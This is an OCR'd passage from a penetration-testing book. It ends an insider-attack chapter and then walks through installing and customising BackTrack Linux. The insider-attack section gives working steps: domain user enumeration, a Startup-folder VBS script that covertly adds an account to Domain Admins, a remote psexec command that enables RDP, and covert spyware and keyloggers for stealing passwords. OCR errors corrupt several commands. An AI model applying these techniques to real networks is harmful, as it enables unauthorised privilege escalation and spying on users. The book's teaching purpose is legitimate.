should be performed against domain controllers because these servers are responsible 
for authentication and contain lists of all users in each domain. Each network may 
contain multiple domain controllers, and they should each be enumerated. In some 
cases, the primary domain controller (PDC) may be configured or hardened in such a 
way that username enumeration may not be possible. In such cases, it is not unusual 
for a secondary or ternary domain controller to be vulnerable to enumeration. 

To enumerate users from a domain controller with Cain, click the Network tab. In 
the left panel, drill down from Microsoft Windows Network to the domain name you're 
interested in, and then to Domain Controllers. Continue to drill down by selecting the 
name of a domain controller and then Users. When the dialog box appears asking Start 
Users Enumeration, click Yes and a list of users will appear in the right panel, as shown 
in Figure 6-4. 

From this hypothetical list, the BDover account stands out as potentially being high- 
ly privileged on the COMHUGECO domain because of its PC Support designation. The 
DAlduk and HJass accounts stand out as users likely to handle sensitive information. To 
see what domain groups BDover is a member of, open a command prompt and type 

net user BDover /domain 

To see which accounts are in the Domain Admins group, type 

net group "domain admins" /domain 

In our hypothetical network example, BDover is a member of the Domain Admins 
group. We now want to locate his computer. A simple way to do this is by using the 
PsLoggedOn tool from the Sysinternals Suite. Execute the command 

psloggedon.exe -lx BDover 
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Figure 6-4 PDC User Enumeration with Cain 
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This will search through every computer in the domain in an attempt to find BDover 
locally logged on. Depending on the number of computers in the domain, this may 
take quite a while or simply be impractical. There are commercial help desk solutions 
available that quickly identify where a user is logged on. In lieu of that, we can check 
the computer names and comments for hints using Cain. 

By clicking the All Computers selection under the COMHUGECO domain in the 
left panel, a list of computers currently connected to the domain is displayed. In addi- 
tion to the computer name, the comments are displayed in the rightmost column. As 
we can see here, a computer described as "Bob's Laptop" could be BDover's: 
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Using PsLoggedOn, we can check to see if BDover is logged into the computer de- 
scribed as "Bob's Laptop" by issuing the following command: 



psloggedon \\comhugec-x31zfp 



Next, by clicking the COMHUGEEC-X31ZLP computer in the left pane of Cain, it 
will attempt to log in using the same account and password as the machine it's running 
from. In our case, that's the local Administrator account and recovered password. The 
account name that Cain uses to log into the remote computer is displayed to the right 
of the name. If Cain can't log in using the local machine's credentials, it will attempt to 
log in using anonymous. In our example, the local Administrator password is the same, 
as shown here: 
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Leveraging local Administrator Access 

So far, we have recovered the shared local Administrator password, identified a privi- 
leged user, and found the user's computer. At this point, we have multiple options. The 
right option will vary with each environment and configuration. In our situation, it 

https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 






Chapter 6: Insider Attacks 

121 



would be advantageous to either add our account to the Domain Admins group or re- 
cover the BDover domain password. Either will allow us access to virtually any com- 
puter and any file stored on the network and protected by Active Directory. 

Joining the Domain Admins Group Adding a user to the Domain Admins 
group requires membership in that group. We know that user BDover is a member of 
that group, so we'll try to get him to add our MBryce account to the Domain Admins 
group without his knowledge. By creating a small VBS script, go.vbs in this case, and 
placing it in the Startup directory on his computer, the next time he logs in, the script 
will ran at his domain permission level, which is sufficient to add our account to the 
Domain Admins group. The go.vbs script is as follows: 

Set obj Shell = WScript . CreateObj ect ( "WScript . Shell" ) 

obj Shell. Run "net group ""Domain Admins"" MBryce /ADD /DOMAIN", 1 

To place the script in the Startup directory, simply map the C$ share using the re- 
covered local Administrator password. This can be done from the Cain interface, from 
Windows Explorer, or from the command prompt with the net use command. In our 
example, the file should be placed in C:\Documents and Settings\BDover\Start Menu\ 
Programs\Startup. You will have to wait until the next time BDover logs in, which may 
be the following day. If you are impatient, you can reboot the computer remotely using 
the Sysinternals PsShutdown tool, but you do so at the risk of arousing the suspicion of 
the user. Confirm your membership in the Domain Admins group using the net group 
command and don't forget to remove the VBS script from the remote computer. 

Recovering the User's Domain Password The simplest way to recover the 
user's password, BDover in this case, is to use commercial activity-logging spyware. 
SpectorSoft eBlaster is perfect for the job and is not detected by commercial AV prod- 
ucts. It can be installed in one of two ways: by using a standard installation procedure 
or by using a preconfigured silent installation package. The silent installation option 
costs more, $99 vs. $198, but will be easier to use during an insider attack exercise. 
Bring the binary with you because downloading it over the client's LAN may get you 
noticed. To install the silent binary, place it in the Startup directory as described in the 
previous section or use PsExec from Sysinternals. If you must use the normal installa- 
tion procedure, you'll have to wait until the user is away from their computer and use 
Microsoft Remote Desktop Protocol (RDP ) or DameWare. DameWare is a commercial 
remote desktop tool that can install itself remotely on the user's computer and remove 
itself completely at the end of the session. If the user's computer is not configured for 
terminal services, you can attempt to enable the service by running the following com- 
mand line remotely with Sysinternals PsExec: 

psexec Wmachinename reg add "hklm\system\currentcontrolset\control\terminal 
server" /f /v f DenyTSConnections /t REG_DWORD /d 

SpectorSoft eBlaster reports are delivered via e-mail at regular intervals, typically 30 
minutes to one hour, and record all login, website, e-mail, and chat activity. Once in- 
stalled, eBlaster can be remotely managed or even silently uninstalled through your 
account on the SpectorSoft website. 
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It is also possible to collect keystrokes using a physical inline device such as the 
KeyGhost. The device comes in three styles: inline with the keyboard cable (as shown 
in Figure 6-5), as a USB device, and as a stand-alone keyboard. Each version collects 
and stores all keystrokes typed. Keystrokes are retrieved by typing an unlock code with 
the device plugged into any computer; it will dump all stored data to a log file. Obvi- 
ously, this is not a good solution for a portable computer, but on a workstation or a 
server, it's unlikely to be detected. 

Finding Sensitive Information Along the way, you may find some users or serv- 
ers you suspect contain sensitive information. Workstation and server names and de- 
scriptions can help point you in the right direction. Now that we have the keys to the 
kingdom, it's very easy to access it. A tool that can help you locate further information 
is Google Desktop. Since we're now a domain administrator, we can map entire file 
server drives or browse any specific user directory or workstation we think may contain 
valuable information. Once mapped, we can put Google Desktop to work to index the 
files for us. We can then search the indexed data by keywords such SSN, Social Security, 
Account, Account Number, and so forth. We can also search by file types, such spread- 
sheets or CAD drawings, or by any industry-specific terminology. Google Desktop can 
also help pinpoint obscure file storage directories that may not have been noticed any 
other way during the testing process. 
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Figure 6-5 KeyGhost device placement 
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Defending Against Insider Attacks 

In order for a company to defend itself against an insider attack, it must first give up the 
notion that attacks only come from the outside. The most damaging attacks often come 
from within, yet access controls and policies on the internal LAN often lag far behind 
border controls and Internet use policy. 

Beyond recognizing the immediate threat, perhaps the most single useful defense 
against the attack scenario described in this chapter is to eliminate LM hashes from 
both the domain and the local SAM files. With LM hashes present on the local worksta- 
tion and shared local Administrator passwords, an attack such as this can be carried out 
very quickly. Without the LM hashes, the attack would take much longer and the gray 
hat penetration testers would have to take more risks to achieve their goals, increasing 
the chances that someone will notice. 

In addition to eliminating LM hashes, the following will be effective in defending 
against the insider attack described in this chapter: 

• Disable or centrally manage USB devices 

• Configure CMOS to only boot from the hard drive 

• Password protect CMOS setup and disable/password protect the boot menu 

• Limit descriptive information in user accounts, computer names, and 
computer descriptions 

• Develop a formulaic system of generating local Administrator passwords so 
each one is unique yet can be arrived at without a master list 

• Regularly search all systems on the network for blank local Administrator 
passwords 

• Any addition to the Domain Admins or other highly privileged group should 
generate a notice to other admins, this may require third-party software or 
customized scripts 
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CHAPTER 



4 



Using the BackTrack Linux 
Distribution 



This chapter shows you how to get and use BackTrack, a Ubuntu (Debian) Linux distri- 
bution for penetration testers that can run from DVD, USB thumb drive, or hard drive 
installation. In this chapter, we cover the following topics: 

• BackTrack: the big picture 

• Installing BackTrack to DVD or USB thumb drive 

• Using the BackTrack ISO directly within a virtual machine 

• Persisting changes to your BackTrack installation 

• Exploring the BackTrack Boot Menu 

• Updating BackTrack 

BackTrack: The Big Picture 

BackTrack is a free, well-designed penetration-testing Linux workstation built and re- 
fined by professional security engineers. It has all the tools necessary for penetration 
testing, and they are all configured properly, have the dependent libraries installed, and 
are carefully categorized in the start menu. Everything just works. 

BackTrack is distributed as an ISO disk image that can be booted directly after being 
burned to DVD, written to a removable USB drive, booted directly from virtualization 
software, or installed onto a system's hard drive. The distribution contains over 5GB of 
content but fits into a 1.5GB ISO by the magic of the LiveDVD system. The system does 
not run from the read-only ISO or DVD media directly. Instead, the Linux kernel and 
bootloader configuration live uncompressed on the DVD and allow the system to boot 
normally. After the kernel loads, it creates a small RAM disk, unpacks the root-disk im- 
age (initrd.gz) to the RAM disk and mounts it as a root file system, and then mounts 
larger directories (like /usr) directly from the read-only DVD. BackTrack uses a special 
file system (casper) that allows the read-only file system stored on the DVD to behave 
like a writable one. Casper saves all changes in memory. 

BackTrack itself is quite complete and works well on a wide variety of hardware 
without any changes. But what if a driver, a pen-testing tool, or an application you nor- 
mally use is not included? Or what if you want to store your home wireless access point 
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encryption key so you don't have to type it in with every reboot? Downloading software 
and making any configuration changes work fine while the BackTrack DVD is running, 
but those changes don't persist to the next reboot because the actual file system is read- 
only. While you're inside the "Matrix" of the BackTrack DVD, everything appears to be 
writable, but those changes really only happen in RAM. 

BackTrack includes several different configuration change options that allow you to 
add or modify files and directories that persist across BackTrack LiveDVD reboots. This 
chapter covers different ways to implement either boot-to-boot persistence or one-time 
changes to the ISO. But now let's get right to using BackTrack. 

Installing BackTrack to DVD 
or USB Thumb Drive 

You can download the free BackTrack ISO at www.backtrack-linux.org/downloads/. 
This chapter covers the bt4-fmal.iso ISO image, released on January 11, 2010. Micro- 
soft's newer versions ofWindows (Vista and 7) include built-in functionality to burn an 
ISO image to DVD, but Windows XP by default cannot. If you'd like to make a Back- 
Track DVD using Windows XP, you'll need to use DVD-burning software such as Nero 
or Roxio. One of the better free alternatives to those commercial products is ISO Re- 
corder from Alex Feinman. You'll find that freeware program at http://isorecorder.alex- 
feinman.com/isorecorder.htm. Microsoft recommends ISO Recorder as part of its 
MSDN program. After you download and install ISO Recorder, you can right-click ISO 
file and select the Copy Image to CD/DVD option, shown in Figure 7-1, and then click 
Next in the ISO Recorder Record CD/DVD dialog box (see Figure 7-2). 

You might instead choose to make a bootable USB thumb drive containing the 
BackTrack bits. Booting from a thumb drive will be noticeably faster and likely quieter 
than running from a DVD. The easiest way to build a BackTrack USB thumb drive is to 
download and run the UNetbootin utility from http://unetbootin.sourceforge.net. 
Within the UNetbootin interface, shown in Figure 7-3, select the BackTrack 4f distribu- 
tion, choose a USB drive to be written, and start the download by clicking OK. After 
downloading the ISO, UNetbootin will extract the ISO content to your USB drive, gen- 
erate a syslinux config file, and make your USB drive bootable. 
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Figure 7-1 Open with ISO Recorder 
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Using the BackTrack ISO Directly 
Within a Virtual Machine 

VMware Player and Oracle's VM VirtualBox are both free virtualization solutions that 
will allow you to boot up a virtual machine with the ISO image attached as a virtual 
DVD drive. This simulates burning the ISO to DVD and booting your physical machine 
from the DVD. This is an easy and quick way to experience BackTrack without "invest- 
ing" a blank DVD or a 2+ GB USB thumb drive. You can also tun BackTrack at the same 
time as your regular desktop OS. Both VMware Player and VirtualBox run BackTrack 
nicely, but you'll need to jump through a few hoops to download VMware Player, so 
this chapter demonstrates BackTrack running within VirtualBox. If you prefer to use 
VMware, you may find it convenient to download BackTrack's ready-made VMware im- 
age (rather than the ISO), saving a few of the steps discussed in this section. 



Creating a BackTrack Virtual Machine with VirtualBox 

When you first run VirtualBox, you will see the console shown in Figure 7-4. Click New 
to create a new virtual machine (VM). After choosing Linux (Ubuntu) and accepting all 
the other default choices, you'll have a new BackTrack VM. To attach the ISO as a DVD 
drive, click Settings, choose Storage, click the optical drive icon, and click the file folder 
icon next to the CD/DVD Device drop-down list box that defaults to Empty (see Figure 
7-5). The Virtual Media Manager that pops up will allow you to add a new disk image 
(ISO) and select it to be attached to the VM. Click Start back in the VirtualBox console 
and your new VM will boot from the ISO. 



§1 Sun VirtualBox 




File Machine Help 





O 



Details _Lj Snapshots I , Description 



New Settings Start Discard 



Welcome to VirtualBox! 

The left part of this window is a list of all virtual machines on your 
computer. The list is empty now because you haven't created any virtual 
machines yet. t'. 

In order to create a new virtual 
machine, press the New button in the 
main tool bar located at the top of the 
window. 



You can press the FI key to get 
instant help, or visit 
www.virtualbox.org for the latest 
information and news. 









Figure 7-4 VirtualBox console 
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Figure 7-5 VirtualBox Settings window 
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Booting the BackTrack LiveDVD System 

When you first boot from the BackTrack LiveDVD system (from DVD or USB thumb 
drive or from ISO under VMware or VirtualBox), you'll be presented with a boot menu 
that looks like Figure 7-6. 

The first choice should work for most systems. You can wait for 30 seconds or just 
press enter to start. We'll discuss this boot menu in more detail later in the chapter. 
After the system boots, type startx and you will find yourself in the BackTrack LiveDVD 
X Window system. 



Start. RankTrank FrawRnffer ( 

Start BackTrack FrameBuffer (800x600) 
Start RankTrank Fnrmslra (no suap) 
Start BackTrack in Safe Graphical Mode 
Start Persistent blue CD 
Start BackTrack in Text Mode 
Start RankTrank Graph Inal Mnde from RAM 
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Rnnt. the First Hard Disk 




back track 



Use the t and 1 keys tn select ulilnh entry Is highlighted. 
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commands before hnntlng, nr 'n* fnr a rnmmand-1 Ine . 



Figure 7-6 BackTrack boot menu 
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Exploring the BackTrack X Windows Environment 

BackTrack is designed for security enthusiasts and includes hundreds of security testing 
tools, all conveniently categorized into a logical menu system. You can see a sample 
menu in Figure 7-7. We won't cover BackTrack tools extensively in this chapter because 
part of the fun of BackTrack is exploring the system yourself. The goal of this chapter is 
to help you become comfortable with the way the BackTrack LiveDVD system works and 
to teach you how to customize it so that you can experiment with the tools yourself. 

In addition to providing the comprehensive toolset, the BackTrack developers did a 
great job making the distribution nice to use even as an everyday operating system. 
You'll find applications such as Firefox, XChat IRC, Liferea RSS reader, Kopete IM, and 
even Wine to run Windows apps. If you haven't used Linux in several years, you might 
be surprised by how usable it has become. On the security side, everything just works: 
one-click Snort setup, Kismet with GPS support and autoconfiguration, unicornscan 
PostgreSQL support, Metasploit's db_autopwn configured properly, and one-click op- 
tions to start and stop the web server, SSH server, VNC server, database server, and TFTP 
server. The developers even included on the DVD the documentation for both the In- 
formation Systems Security Assessment Framework (ISSAF) and Open Source Security 
Testing Methodology Manual (OSSTMM) testing and assessment methodologies. If you 
find anything missing, the next several sections show you how you can customize the 
distribution any way you'd like. 

Starting Network Services 

Because BackTrack is a pen-testing distribution, networking services don't start by de- 
fault at boot. (BackTrack's motto is "The quieter you become, the more you are able to 
hear.") However, while you are exploring BackTrack, you'll probably want to be con- 
nected to the Internet. Type the following command at the root@bt:~# prompt: 

/etc/init . d/networking start 
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Figure 7-7 BackTrack menu 
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If you are running BackTrack inside a VM or have an Ethernet cable plugged in, this 
should enable your adaptor and acquire a DHCP address. You can then run the ifconfig 
command to view the adaptors and verify the configuration. If you prefer to use a GUI, 
you can launch the KDE Network Interfaces module from the Programs menu by choos- 
ing Settings | Internet & Network | Network Interfaces. 

Wireless sometimes works and sometimes does not. BackTrack 4 includes all the 
default wireless drivers present in the 2.6.30 kernel, and the BackTrack team has in- 
cluded additional drivers with the distribution. However, connecting via 802.11 is trick- 
ier than using a wired connection for a number of reasons. First, you cannot get direct 
access to the wireless card if running BackTrack from within a virtual machine. VMware 
or VirtualBox can bridge the host OS's wireless connection to the BackTrack guest OS to 
give you a simulated wired connection, but you won't be able to successfully execute 
any wireless attacks such as capturing 802.11 frames to crack WEP. Second, some wire- 
less cards just do not work. For example, some revisions of Broadcom cards in Mac- 
Books just don't work. This will surely continue to improve, so check http://www 
.backtrack-linux.org/bt/wireless-drivers/ for the latest on wireless driver compatibility. 

If your wireless card is supported, you can configure it from the command line us- 
ing the iwconfig command or using the Wicd Network Manager GUI found within the 
Internet menu. 

Reference 

VirtualBox home page www.virtualbox.org 

Persisting Changes to Your BackTrack 
Installation 

If you plan to use BackTrack regularly, you'll want to customize it. Remember that the 
BackTrack LiveDVD system described so far in this chapter is based on a read-only file 
system. Configuration changes are never written out to disk, only to RAM. Making even 
simple configuration changes, such as connecting to your home wireless access point 
and supplying the WPA key, will become tedious after the third or fourth reboot. Back- 
Track provides three methods to persist changes from boot to boot. 

Installing Full BackTrack to Hard Drive 
or USB Thumb Drive 

The easiest way to persist configuration changes, and the way most people will choose 
to do so, is to install the full BackTrack system to your hard drive or USB thumb drive. 
BackTrack then operates just like a traditional operating system, writing out changes to 
disk when you make changes. BackTrack includes an install. sh script on the desktop to 
facilitate the full install. Double-click install. sh to launch the Install GUI, answer a se- 
ries of questions, and minutes later you can reboot into a regular Linux installation 
running from the hard drive or a USB thumb drive. One step in the installation is dis- 
played in Figure 7-8. 
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Figure 7-8 BackTrack install-to-disk wizard 



BackTrack Inside VirtualBox 

Figure 7-8 shows that the full installer will help you partition and create a file sys- 
tem on a raw disk. However, if you would like to continue using BackTrack in 
LiveDVD mode and not perform the full install, you will probably want additional 
read-write disk space. In this case, you may need to partition the disk and create a 
file system. If you are running within the VirtualBox virtualization environment, 
you will also likely want to install VirtualBox's Guest Additions for Linux. Installing 
this package will enable Shared Folder support between the host and guest OSs 
(and some other niceties). Following are the steps to configure the VirtualBox hard 
drive properly and then to install the VirtualBox Guest Additions for Linux: 

1. Format and partition the /dev/hda disk provided by VirtualBox. The 
command to begin this process is fdisk /dev/hda. From within fdisk, 
create a new partition (n), make it a primary partition (p), label it 
partition 1 (1), accept the default start and stop cylinders (press enter 
for both prompts), and write out the partition table (w). 

2. With the disk properly partitioned, create a file system and mount 
the disk. If you want to use the Linux default file system type (ext3), 
the command to create a file system is mkfs.ext3 /dev/hdal. The disk 
should then be available for use by creating a mount point (mkdir / 
mnt/vbox) and mounting the disk (mount /dev/hdal /mnt/vbox). 
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3. Now, with read-write disk space available, you can download 
and install VirtualBox Guest Additions for Linux. You need to 
download the correct version of VirtualBox Guest Additions for 
your version of VirtualBox. The latest VirtualBox at the time of this 
writing is 3.1.6, so the command to download the VirtualBox Guest 
Additions is wget http://download.virtualbox. 0 rg/virtualbox/ 3 .l. 6 / 
VBoxGuestAdditions_3. 1.6.iso. 

4. When the download completes, rename the file to something 
easier to type (mv VBoxGuestAdditions* vbga.iso), create a mount 
point for the ISO (mkdir /mnt/vbga), mount the ISO (mount -o 
loop vbga.iso /mnt/vbga), and run the installer (cd /mnt/vbga; 
./VBoxLinuxAdditions-x86.run). Here, you can see the result of 
installing the VirtualBox Guest Additions: 











1 Session 


Edit View 


Bookmarks Settings Help 




1 -oot@bt 


/mnt/vbga# 


,/VBoxLinuxAdditions-x86. run 


0 



Verifying archive integrity... All good. 

Uncompressing VirtualBox 3.1.6 Guest Additions for Linux 

VirtualBox Guest Additions installer 

Building the VirtualBox Guest Additions kernel modules 
Building the main Guest Additions module ...done. 

Building the shared folder support module ...done. 

Building the OpenGL support module ...done. 

Doing non-kernel setup of the Guest Additions ...done. 

Starting the VirtualBox Guest Additions ...done. 

Installing the Window System drivers 
Installing X.Org Server 1.5 modules ...done. 

Setting up the Window System to use the Guest Additions ...done. 

You may need to restart the hal service and the Window System (or just restart 
the guest system) to enable the Guest Additions. 

Installing graphics libraries and desktop services components ...done. 
root@bt : /mnt/vbgJjJ w I 

] a Shell 



After you install VirtualBox Guest Additions, you can begin using Shared 
Folders between the Host OS and Guest OS. To test this out, create a Shared 
Folder in the VirtualBox user interface (this example assumes it is named 
"shared"), create a mount point (mkdir /mnt/shared), and mount the device us- 
ing new file system type vboxsf (mount -t vboxsf shared /mnt/shared). 
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Creating a New ISO with Your One-time Changes 

Installing the full BackTrack installation to disk and treating it as a regular Linux instal- 
lation certainly allows you to persist changes. In addition to persisting changes boot to 
boot, it will improve boot performance. However, you'll lose the ability to pop a DVD 
into any system and boot up BackTrack with your settings applied. The full BackTrack 
installation writes out 5+ GB to the drive, too much to fit on a DVD. Wouldn't it be 
great if you could just boot the regular LiveDVD 1.5GB ISO, make a few changes, and 
create a new ISO containing the bt4.iso bits plus your changes? You could then write 
that 1 .5+ GB ISO out to DVD, making your own version of BackTrack LiveDVD. 

The BackTrack developers created a script that allows you to do just that. You'll need 
8+ GB of free disk space to use their bt4-customise.sh script, and it will run for a num- 
ber of minutes, but it actually works! Here is the set of steps: 

1. Download the customise script from the BackTrack web page (wget http:// 
www.offensive-security.com/bt4-customise.sh). 

2. Edit the script to point it to your bt4-final.iso. To do this, change the third 
line in the script assigning btisoname equal to the full path to your BackTrack 
ISO, including the filename. 

3. Change to a directory with 8+ GB of free writable disk space (cd /mnt/vbox) 
and run the shell script (sh bt4-customise.sh). 

Figure 7-9 shows the script having run with a build environment set up for you, 
dropping you off in a modifiable chroot. At this point, you can update, upgrade, add, 
or remove packages, and make configuration changes. 











1 Session 


Edit View Bookmarks Settings 


Help 


1 



############################################################## 
[*] BackTrack 4 (pre)Final customisation script 
[*] Setting up the build environment... 

[*] Copying over files, please wait ... 
############################################################## 
[*] Entering livecd. 

############################################################## 
[*] Now you can modify the LiveCD. At minimum, we recommend : 
[*] apt-get update && apt-get upgrade & apt-get clean 
############################################################## 
[*] If you are running a large update, you might need to stop 
[*] services like crond, udev, cups, etjc^ln the chroot 
[*] services like crond, udev, cups, etc in the chroot 
[*] before exiting your chroot environment. 
############################################################## 
[*] Once you have finished your modifications, type "exit" 
############################################################## 
root@bt:/# | 

fSl » Shell I 



Figure 7-9 Customise script chroot environment 
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When you type exit in this shell, the script builds a modified ISO for you, including 
the updates, additions, and configuration changes you introduced. This process may 
take quite a while and will consume 8+ GB of free disk space. Figure 7-10 shows the 
beginning of this ISO building process. 

The resulting custom BackTrack ISO can then be burned to DVD or written to a 
2+ GB USB thumb drive. 

Using a Custom File that Automatically Saves 
and Restores Changes 

There is a third option to persist changes to BackTrack that combines the best of both 
previous options. You can maintain the (relatively) small 1.5GB LiveDVD without hav- 
ing to do the full 5+ GB hard drive install, and your changes are automatically persist- 
ed — no additional ISO is needed for each change. As an added bonus, this approach 
allows you to easily make differential-only backups of the changes from the BackTrack 
baseline. You can just copy one file to the thumb drive to roll back the entire BackTrack 
installation to a previous state. It's very slick. The only downside is the somewhat tricky 
one-time initial setup. 

For this approach, you'll need to a 2+ GB thumb drive. Format the whole drive as 
FAT32 and use UNetbootin to extract the ISO to the thumb drive. Next, you need to 
create a specific kind of file at the root of the USB thumb drive with a specific name. 
You'll need to create this file from within a Linux environment. Boot using your newly 
written thumb drive. BackTrack will have mounted your bootable USB thumb drive as 
/media/cdromO. The device name is cdromO because BackTrack assumes the boot de- 
vice is a LiveDVD, not a USB thumb drive. You can confirm this by typing the mount 
command. You'll see something like the output in Figure 7-11. 
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root@bt:/# apt-get clean 

root@bt:/# exit 

exit 

[*] Exited the build environemnt, unmounting images. 
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Figure 7- 1 0 Building a modified BackTrack ISO 
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root@bt: — - Shell - Konsole ® © W 



Session Edit View Bookmarks Settings Help 
root@bt: # mount 

tmpfs on /lib/init/rw type tmpfs (rw, nosuid, mode=0755) 

/proc on /proc type proc (rw,noexec,nosuid,nodev) 

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev) 

varrun on /var/run type tmpfs (rw, nosuid, mode=0755) 

vartock on /var/tock type tmpfs ( rw.noexec, nosuid, nodev, mode=1777) 

udev on /dev type tmpfs ( rw,mode=0755) 

tmpfs on /dev/shm type tmpfs ( rw, nosuid, nodev) 

devpts on /dev/pts type devpts (rw, noexec, nosuid, gid=5,mode=620) 

rootfs on / type rootfs (rw) 

fjlWtl nn /svs/fs/f use /rnnnprt inns tone fnsertl ( rw, re'.atime) 

/dev/sdbl on /media/cdromO type vfat ( ro, loatime, fmask=0022, dmask=0000,al 
low uTime=uu^,coaepage=c P 4:$/,iocnarseT=iso8859-l) 

/dev/loop0 on /rofs type squashfs (ro,noatime) 
tmpfs on /tmp type tmpfs ( rw, nosuid , nodev) 
root@bt: # | 

" ' & Shell j 



Figure 7-1 I BackTrack mounted devices after booting from USB thumb drive 



In this case, the USB thumb drive is assigned /dev/sdbl and is mounted as read- 
only. To write a special file to the root of the thumb drive, you'll need to remount the 
USB thumb drive read-write. Issue this command: 

mount -o remount, rw /media/cdromO 

BackTrack will now allow you to write to the USB thumb drive. 

This special file you are about to create will hold all the changes you make from the 
BackTrack baseline. It's really creating a file system within a file. The magic that allows 
this to happen is the casper file system, the file system used by BackTrack alluded to 
earlier in the chapter. If BackTrack finds a file named casper-rw at the root of any 
mounted partition and is passed the special persistent flag at boot, BackTrack will use 
the casper-rw file as a file system to read and write changes from the BackTrack baseline. 
Let's try it out. 

After you have remounted the USB thumb drive in read-write mode, you can use the 
dd command to create an empty file of whatever size you would like to allocate to per- 
sisting changes. The following command creates a 500MB casper-rw file: 

dd if=/dev/zero of=/media/cdromO/casper-rw bs=lM count=500 

Next, create a file system within that casper-rw file using the mkfs command: 

mkfs.ext3 -F /media/cdromO/casper-rw 

Remember that you'll need a writable disk for this to work. If you have booted from 
a DVD or from an ISO within virtualization software, BackTrack will not be able to cre- 
ate the casper-rw file and you will get the following error message: 

dd: opening 'casper-rw': Read-only file system 
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Finally, if you have successfully created the casper-rw file and created a file system 
within the file, you can reboot to enjoy persistence. At the boot menu (refer to Figure 
7-6), choose the fifth option, Start Persistent Live CD. Any changes that you make in 
this persistence mode are written to this file system inside the casper-rw file. You can 
reboot and see that changes you made are still present. To make a backup of all chang- 
es you have made at any point, copy the casper-rw file to someplace safe. Remember 
that the thumb drive is formatted as FAT32, so you can pop it into any PC and copy off 
the casper-rw file. To revert to the BackTrack baseline, delete the casper-rw file. To tem- 
porarily revert to the BackTrack baseline without impacting your persistence, make a 
different choice at the boot option. 

References 

BackTrack 4 Persistence www.backtrack-linux.org/forums/backtrack-howtos/ 
819-backtrack-4-fmal-persistent-usb-* * * easiest-way* * *.html 
BT4 customise script www.offensive-security.com/blog/backtrack/ 
customising-backtrack-live-cd-the-easy-way/ 

Ubuntu Persistence https://help.ubuntu.com/community/LiveCD/Persistence 



Exploring the BackTrack Boot Menu 

We have now demonstrated two of the nine options in the default BackTrack boot 
menu. The first option boots with desktop resolution 1024x768, and the fifth option 
boots in persistent mode with changes written out to and read from a casper file sys- 
tem. Let's take a closer look at each of the boot menu options and the configuration 
behind each option. 

BackTrack uses the grub boot loader. Grub is configured by a file named menu.lst 
on the ISO or DVD or thumb drive within the boot\grub subdirectory. For most of the 
startup options, the menu.lst file will specify the title to appear in the menu, the kernel 
with boot options, and the initial RAM disk to use (initrd). For example, here is the 
configuration for the first choice in the BackTrack boot menu: 

title Start BackTrack FrameBuffer (1024x768) 

kernel /boot/vmlinuz BOOT=casper nonpersistent rw quiet vga=0x317 

initrd /boot/initrd. gz 



Referring to Figure 7-6, you can see that the title is displayed verbatim as the de- 
scription in the boot menu. Most of the kernel boot options are straightforward: 

• Use the casper file system (casper). 

• Do not attempt to persist changes (nonpersistent). 

• Mount the root device read-write on boot (rw). 

• Disable most log messages (quiet). 
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The vga parameter assignment is not as obvious. Table 7-1 lists the VGA codes for 
various desktop resolutions. 

Therefore, the first choice in the BackTrack boot menu having boot option vga=0x31 7 
will start BackTrack with desktop resolution 1024x768 and 64k colors. 

The second BackTrack boot menu option, Start BackTrack FrameBuffer (800x600), 
is similar to the first option with the primary difference being vga=0x314 instead of 
vga=0x317. Referring to Table 7-1, we can see that 0x314 means desktop resolution 
800x600 with 64k colors. 

The third BackTrack boot menu option, Start BackTrack Forensics (no swap), uses 
the same boot flags as the first boot option. The differences are only in the initial RAM 
disk. By default, BackTrack will automount any available drives and utilize swap parti- 
tions where available. This is not suitable for forensic investigations, where the integ- 
rity of the drive must absolutely be maintained. The initrdfr.gz initial RAM disk 
configures BackTrack to be forensically clean. The system initialization scripts will not 
look for or make use of any swap partitions on the system, and this configuration will 
not automount file systems. The BackTrack Forensics mode is safe to use as a boot DVD 
for forensic investigations. 

The only difference in the fourth BackTrack boot menu option, Start BackTrack in 
Safe Graphical Mode, is the keyword xforcevesa. This option forces X Windows to use 
the VESA driver. If the regular VGA driver does not work for an uncommon hardware 
configuration, you can try booting using the VESA driver. 

We discussed the fifth option, Start Persistent Live CD, earlier. You can see from the 
menu.lst file that the keyword persistent is passed as a boot option. 

You can start BackTrack in text mode with the sixth boot option, Start BackTrack in 
Text Mode. The boot option to do so from the menu.lst file is textonly. 

If you'd like the boot loader to copy the entire live environment to system RAM and 
run BackTrack from there, choose the seventh option, Start BackTrack Graphical Mode 
from RAM. The boot option for this configuration option is toram. 

The final two boot menu options are less likely to be used. If you'd like to do a 
system memory test, you can choose the eighth option to "boot" the program /boot / 
memtest86+.bin. Finally, you can boot from the first hard disk by choosing the ninth 
and final boot option. 



Number of Colors 
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1280X1024 
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0x301 
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Table 7-1 Grub Boot Loader VGA Codes 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 







Chapter 7: Using the BackTrack Linux Distribution 

139 



The default menu. 1st file is a nice introduction to the commonly used boot configu- 
rations. If you have installed the full BackTrack installation or boot into a persistence 
mode, you can change the menu. 1st file by mixing and matching boot options. For ex- 
ample, you might want to have your persistence mode boot into desktop resolution 
1280* 1024 with 16-bit color. That's easy. Just add the value vga=0x31A as a parameter 
to the fifth option having the persistent keyword and reboot. 

Reference 

Linux kernel parameters www.kernel.org/doc/Documentation/kernel-parameters.txt 

Updating BackTrack 

The BackTrack developers maintain a repository of the latest version of all tools con- 
tained in the distribution. You can update BackTrack tools from within BackTrack using 
the Advanced Packaging Tool (APT). Here are three useful apt-get commands: 



apt-get update 


Synchronizes the local package list with the BackTrack repository 


apt-get upgrade 


Downloads and installs all the updates available 


apt-get dist-upgrade 


Downloads and installs all new upgrades 



You can show all packages available, a description of each, and a version of each 
using the dpkg command dpkg -1. You can search for packages available via APT using 
the apt-cache search command. Here's an example of a series of commands one might 
run to look for documents on snort. 

root0bt:~# dpkg -1 '‘snort*’ 

dpkg shows airsnort 0.2.7e-bt2 and snort setup 2.8-bt3 installed on BackTrack 4 by 
default. 

We can use apt-cache to show additional snort-related packages available in the 
repository: 

root0bt:~# apt-cache search 'snort' 

The APT cache has the following package: 

snort-doc - Documentation for the Snort IDS [documentation] 

Use apt-get to download and install this package: 

root0bt:~# apt-get install snort-doc 
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The package is downloaded from http://archive.offensive-security.com and in- 
stalled. To find where those documents were installed, run the dpkg command again, 
this time with -L: 

root@bt:~# dpkg -L snort-doc 

Bingo! We see that the docs were installed to /usr/share/doc/snort-doc. 
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Using Metasploit 




This chapter will show you how to use Metasploit, a penetration testing platform for 
developing and launching exploits. In this chapter, we discuss the following topics: 

